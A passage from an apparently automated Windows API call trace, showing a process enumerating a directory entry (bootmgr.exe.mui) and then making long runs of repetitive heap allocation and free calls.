ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.626] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.626] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.626] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.626] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.626] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.626] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.626] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.626] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.626] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.626] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.626] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.626] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.626] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.626] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.626] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.626] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.626] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.626] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.626] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.626] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.635] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.635] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.635] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.635] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.635] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.635] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.635] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.635] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.636] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.636] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.637] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.637] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.638] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.638] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.639] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.639] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.639] HeapFree (in: hHeap=0xcd0000, 